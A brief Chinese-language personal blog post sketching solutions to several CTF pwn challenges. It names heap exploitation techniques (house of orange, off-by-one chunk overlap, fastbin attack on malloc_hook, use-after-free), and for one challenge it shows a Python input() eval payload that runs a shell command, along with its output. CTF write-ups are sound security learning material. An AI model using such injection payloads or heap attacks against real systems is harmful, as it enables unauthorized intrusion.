这几天我真的是忙的一
就记录一下这几天的pwn的思路
国赛pwn开始看no_free想到了house of orange但是不太会利用,堆学的不是很好.jpg
但是之后做就是感觉来了,晚上做了2到成功以分区十几名的成绩进入了分区赛,希望大佬们轻点打
钓鱼城杯就帮队伍做了2个pwn,真的难无法F5还是队友厉害
3个pwn
babyjsc
这个硬是被玩成了签到,python的input函数有eval的功能就直接命令执行了如图所示
>>> input()
__import__("os").system('ls')
8.16.txt Music libc.so
Applications Parallels pwn
Applications (Parallels) Pictures pwntools
Desktop Public timu.c
Documents bigbear web
Downloads bigbear.py 今日攻击ip 8.15.docx
Library chall.py
Movies hw
0
>>>
easybox
显然程序有off by one的漏洞,没有show函数我们可以使用chunkoverlop修改chunk的fd使其指向libc段修改IO来leak,然后就是正常的fastbin attack打malloc_hook了
exp晚点上
maj
这题利用思路差不多就是多了一点逆向而已,存在uaf,利用uaf修改main_aren指向IO然后就和上一题一样了,还有就是申请的地方输入80即可继续操作
exp晚点更